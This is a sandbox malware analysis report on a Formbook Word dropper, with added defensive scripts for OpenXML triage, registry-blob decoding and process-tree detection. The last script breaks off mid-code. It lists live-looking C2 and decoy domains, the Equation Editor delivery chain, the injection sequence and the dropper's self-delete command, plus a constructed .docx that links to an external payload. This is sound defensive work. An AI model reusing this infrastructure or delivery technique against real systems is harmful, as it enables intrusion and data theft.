Analysis

max time kernel: 148s
max time network: 143s
platform: windows7_x64
resource: win7-20240419-en
resource tags: arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
submitted: 26-06-2024 01:11

Tasks
  Static task: static1
  Behavioral task: behavioral1
    Sample: 3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0.docx
    Resource: win7-20240419-en
  Behavioral task: behavioral2
    Sample: 3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0.docx
    Resource: win10v2004-20240611-en
General

Target: 3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0.docx
Size: 16KB
MD5: e86424648b277754b74e507d51878e71
SHA1: e86498df0eb2a8514e0d55f9a33148779bf5b66d
SHA256: 3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0
SHA512: 59c3c950a0f450b895b091fdf7f9664ed75124be0b7c699631b0a753bef062304151e1e58b3dfcc2032e819f339336c996482a6de94eee3e6327d24e8c51f84c
SSDEEP: 384:0yXRxAxW4s8PL8wi4OEwH8TIbE91r2fR8JYbvimVmPFM:0cRM/5P3DOqnYJ6qvfVmPG
Malware Config

Extracted
  Family: formbook
  Version: 4.1
  Campaign: btrd
  C2 / decoy domains (the list below):

Formbook configs carry the live C2 host alongside a set of decoy domains that the bot also contacts, so treat the list as a hunting and detection set and confirm the live C2 from network telemetry before blocking on it or attributing infrastructure.
everslane.com
prairieviewelectric.online
dszvhgd.com
papamuch.com
8129k.vip
jeffreestar.gold
bestguestrentals.com
nvzhuang1.net
anangtoto.com
yxfgor.top
practicalpoppers.com
thebestanglephotography.online
koormm.top
criika.net
audioflow.online
380747.net
jiuguanwang.net
bloxequities.com
v321c.com
sugar.monster
agriwithai.com
rd8.online
texanboxes.com
h7wlvwr4afx.top
furryfriendsupply.store
xmentorgroup.com
runccl.com
fairplaytavern.com
concretecountertopsolutios.com
wzxq.xyz
outletivo.com
studyasp.net
pure1027.com
xpffvn.cfd
liposuctionclinics2.today
rouchoug.top
rifasgados.com
tesourosobrerodas.site
1stclasstv.net
invest247on.com
watch2movie.xyz
martline.website
naddafornadda.com
drbtcbtc.com
turbrun.com
autounion999370.top
wirewizardselectric.net
0757hunyin.net
researchforhighschool.com
thedivorcesurvivalguide.com
emeraldsurrogatefabric.com
home-repair-contractors-kfm.xyz
onlynaturlpt.shop
agiletzal.site
dylanmoranrules.com
ngbbvuhkm5.asia
proveedorafrac.com
pho3nixkidsghana.com
greatfightcompany.com
hotnerdsg.com
thecolourgrey.com
librarylatte.com
videomademagic.com
coinrun.net
cnoszirzbkaqz.com
Signatures

Formbook payload (2 IoCs)
  behavioral1/memory/272-135-0x0000000000400000-0x000000000042F000-memory.dmp  (yara_rule: formbook)
  behavioral1/memory/2716-149-0x0000000000080000-0x00000000000AF000-memory.dmp  (yara_rule: formbook)
  Both regions are 0x2F000 bytes (188KB): the unpacked payload in the second instance of the dropper (pid 272) and again in raserver.exe (pid 2716).

Blocklisted process makes network request (1 IoC)
  flow 11  pid 2636  EQNEDT32.EXE

Downloads MZ/PE file

Abuses OpenXML format to download file from external location

Executes dropped EXE (2 IoCs)
  pid 1824  nelb82019.scr
  pid 272   nelb82019.scr

Loads dropped DLL (1 IoC)
  pid 2636  EQNEDT32.EXE

Suspicious use of SetThreadContext (3 IoCs)
  PID 1824 set thread context of 272   nelb82019.scr -> nelb82019.scr
  PID 272 set thread context of 1208   nelb82019.scr -> Explorer.EXE
  PID 2716 set thread context of 1208  raserver.exe -> Explorer.EXE

Drops file in Windows directory (1 IoC)
  File opened for modification C:\Windows\Debug\WIA\wiatrace.log  WINWORD.EXE
  (the Windows Image Acquisition trace log; ordinary Word activity, not part of the infection)

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor (1 TTP, 1 IoC)
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
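The two signatures "Abuses OpenXML format to download file from external location" and "Launches Equation Editor" describe the delivery mechanism: a relationship inside the .docx package points at a file outside the package, and the OLE object that references it names an Equation Editor ProgID, so Word starts EQNEDT32.EXE out of process (the -Embedding argument in the process tree) and hands it the fetched file. The script below is an added example, not code from the report or the sandbox. It builds a constructed, minimal .docx in memory (the host example.invalid and the file name are hypothetical) that mimics that layout, then scans it the same way you would scan a real sample: every .rels part is checked for non-hyperlink relationships with TargetMode="External", and every XML part for OLEObject ProgIDs.

```python
"""Triage an OpenXML package for external relationships and Equation Editor objects."""
import io
import xml.etree.ElementTree as ET
import zipfile

PKG_RELATIONSHIP = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def scan_openxml(package: bytes) -> dict:
    """Return every non-hyperlink relationship with TargetMode="External", every OLE
    ProgID found in the package's XML parts, and whether one of them is Equation Editor."""
    findings = {"external": [], "ole_progids": [], "equation_editor": False}
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if name.endswith(".rels"):
                for rel in ET.fromstring(zf.read(name)).iter(PKG_RELATIONSHIP):
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    if rel.get("TargetMode") == "External" and rtype != "hyperlink":
                        findings["external"].append((name, rtype, rel.get("Target", "")))
            elif name.endswith(".xml"):
                for el in ET.fromstring(zf.read(name)).iter():
                    progid = el.get("ProgID")  # unprefixed attribute on o:OLEObject
                    if progid:
                        findings["ole_progids"].append(progid)
                        # Equation.2 / Equation.3 are served by EQNEDT32.EXE.
                        if progid.lower().startswith("equation"):
                            findings["equation_editor"] = True
    return findings


def build_sample_docx() -> bytes:
    """Constructed package (not the analysed sample): an OLE object whose relationship
    target is a remote file at a hypothetical URL and whose ProgID is Equation Editor."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
        ' xmlns:o="urn:schemas-microsoft-com:office:office"'
        ' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:body><w:p><w:r><w:object>'
        '<o:OLEObject Type="Link" ProgID="Equation.3" r:id="rId5" UpdateMode="Always"/>'
        '</w:object></w:r></w:p></w:body></w:document>'
    )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId5" Type="{OFFICE_REL}oleObject"'
        ' Target="http://example.invalid/nelb.doc" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for key, value in scan_openxml(build_sample_docx()).items():
        print(f"{key}: {value}")
```

Point scan_openxml at the bytes of a real .docx/.xlsx/.pptx to get the same three fields; an external oleObject, attachedTemplate or frame relationship combined with an Equation ProgID is the pattern this sample's signatures describe. The scan is static and will not see objects that are only referenced from embedded binary streams, so treat a clean result as "nothing found in the XML", not as "safe".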
Modifies Internet Explorer settings
  These are the HTML/MHTML editor and the "Send to OneNote" / "Export to Microsoft Excel" menu registrations that Word (Office14) writes on its first launch; they are produced by WINWORD.EXE itself and are not attacker activity.
  Process: WINWORD.EXE
  Set value (int) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit
  Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote
  Set value (int) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell
  Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor
  Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND
  Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit
  Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
  Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
  Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor
  Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"
  Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND
  Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell
  Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell
  Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit
  Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command
  Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"
  Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command
  Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell
  Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"
Modifies registry class (64 IoCs)
  These are the .htm/.mht OpenWithList, htmlfile/mhtmlfile verb and msohtmed.exe icon-handler registrations that Word (Office14) writes on its first launch; the REG_BINARY "command" values are Windows Installer descriptors, not attacker payload. All 64 come from WINWORD.EXE.
  Process: WINWORD.EXE
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command
  Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"
  Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"
  Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit
  Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command
  Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe
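The "Set value (data) ... \command\command = 7800620027..." entries in the Internet Explorer settings and registry class sections above are the ones an analyst is most likely to stop on, because a long hex blob next to a shell verb looks like a planted command. Decoding them shows they are the Windows Installer advertised-shortcut ("Darwin") descriptors Office writes beside each verb: a 20-character compressed ProductCode, a feature name, a '>' separator, a 20-character compressed ComponentId and the verb's arguments, which match the plain-string sibling values on the page (/n "%1", /dde, %1). The script below is an added example, not code from the report or the sandbox; the hex constants are copied from the report, and the compressed codes are left in their base-85 form rather than expanded to GUIDs.

```python
"""Decode the REG_BINARY 'command' values from the report into their Darwin descriptor parts."""

# Hex copied verbatim from the report (Word, Excel and Publisher OpenWithList entries).
WORD_BLOB = "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000"
EXCEL_BLOB = "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000"
PUB_BLOB = "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000"


def decode_reg_binary_string(hex_value: str) -> str:
    """The sandbox dumps REG_BINARY as hex; here the bytes are a NUL-terminated UTF-16LE string."""
    text = bytes.fromhex(hex_value).decode("utf-16-le")
    return text.split("\x00", 1)[0]


def parse_darwin_descriptor(text: str) -> dict:
    """Split <ProductCode, 20 chars><Feature>'>'<ComponentId, 20 chars>[ args].

    The two 20-character codes are Windows Installer compressed GUIDs and are
    returned as-is; the feature name and the trailing verb arguments are plain text."""
    product = text[:20]
    feature, sep, rest = text[20:].partition(">")
    if not sep:
        raise ValueError("not a Darwin descriptor: no '>' separator")
    return {
        "product": product,
        "feature": feature,
        "component": rest[:20],
        "args": rest[20:].strip(),
    }


def describe(hex_value: str) -> dict:
    """Convenience wrapper: hex blob in, descriptor fields out."""
    return parse_darwin_descriptor(decode_reg_binary_string(hex_value))


if __name__ == "__main__":
    for label, blob in (("Word", WORD_BLOB), ("Excel", EXCEL_BLOB), ("Publisher", PUB_BLOB)):
        print(label, describe(blob))
```

All three blobs share the same ProductCode (the Office 2010 installation the sandbox image carries) and differ only in feature, component and arguments, which is exactly what a per-application shell-verb registration from one MSI looks like. A descriptor whose arguments point somewhere other than an Office binary, or whose ProductCode differs from the installed suite's, is the case that would deserve a second look.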
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid 1312  WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (30 IoCs)
  pid 272   nelb82019.scr  (2 events)
  pid 2716  raserver.exe   (28 events)

Suspicious behavior: MapViewOfSection (5 IoCs)
  pid 272   nelb82019.scr  (3 events)
  pid 2716  raserver.exe   (2 events)

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Token: SeDebugPrivilege     pid 272   nelb82019.scr
  Token: SeDebugPrivilege     pid 2716  raserver.exe
  Token: SeShutdownPrivilege  pid 1208  Explorer.EXE  (2 events)
  Token: SeShutdownPrivilege  pid 1312  WINWORD.EXE

Suspicious use of SetWindowsHookEx (2 IoCs)
  pid 1312  WINWORD.EXE  (2 events)

Suspicious use of WriteProcessMemory (23 IoCs)
  PID 2636 wrote to memory of 1824  EQNEDT32.EXE -> nelb82019.scr   (4 events)
  PID 1824 wrote to memory of 272   nelb82019.scr -> nelb82019.scr  (7 events)
  PID 1208 wrote to memory of 2716  Explorer.EXE -> raserver.exe    (4 events)
  PID 2716 wrote to memory of 1076  raserver.exe -> cmd.exe         (4 events)
  PID 1312 wrote to memory of 2500  WINWORD.EXE -> splwow64.exe     (4 events)
Processes

C:\Windows\Explorer.EXE  (pid 1208)
  command line: C:\Windows\Explorer.EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  +-- C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE  (pid 1312)
      command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0.docx"
      - Drops file in Windows directory
      - Modifies Internet Explorer settings
      - Modifies registry class
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      +-- C:\Windows\splwow64.exe  (pid 2500)
          command line: C:\Windows\splwow64.exe 12288
  +-- C:\Windows\SysWOW64\raserver.exe  (pid 2716)
      command line: "C:\Windows\SysWOW64\raserver.exe"
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      +-- C:\Windows\SysWOW64\cmd.exe  (pid 1076)
          command line: /c del "C:\Users\Admin\AppData\Roaming\nelb82019.scr"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  (pid 2636)
  command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
  +-- C:\Users\Admin\AppData\Roaming\nelb82019.scr  (pid 1824)
      command line: "C:\Users\Admin\AppData\Roaming\nelb82019.scr"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      +-- C:\Users\Admin\AppData\Roaming\nelb82019.scr  (pid 272)
          command line: "C:\Users\Admin\AppData\Roaming\nelb82019.scr"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of AdjustPrivilegeToken

Reading the tree: EQNEDT32.EXE is a second root rather than a child of WINWORD.EXE because Word instantiates Equation Editor through COM (the -Embedding argument), so a detection keyed only on children of Word misses the whole chain. The dropper nelb82019.scr (pid 1824) starts a second copy of itself and replaces its thread context (SetThreadContext 1824 -> 272); that copy injects into Explorer.EXE (272 -> 1208); the injected Explorer launches raserver.exe (WriteProcessMemory 1208 -> 2716), which carries the second Formbook payload region (memory 2716-149) and finally removes the dropper from disk through cmd.exe /c del.
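The tree above is the whole detection opportunity in one place: Equation Editor spawning a child, an executable with a .scr extension running out of %APPDATA%\Roaming, an injected Explorer launching an argument-less SysWOW64 binary, and cmd.exe deleting the dropper. The script below is an added example, not code from the report or the sandbox. It replays the tree as constructed process-creation events (pids and command lines taken from the report; the parent of EQNEDT32.EXE is not shown on the page, so it is set to 0) and runs four rules over them. The rules generalise beyond this sample to any dropper that follows the same pattern; the fourth is deliberately labelled as a weaker indicator.

```python
"""Flag the Equation Editor -> dropper -> injected Explorer -> self-delete chain in process events."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events mirroring the process tree in this report (pids from the report).
# EQNEDT32.EXE is started out of process by COM; its real parent is not on the page, so ppid=0.
EVENTS = [
    ProcEvent(1208, 0, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(1312, 1208, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n '
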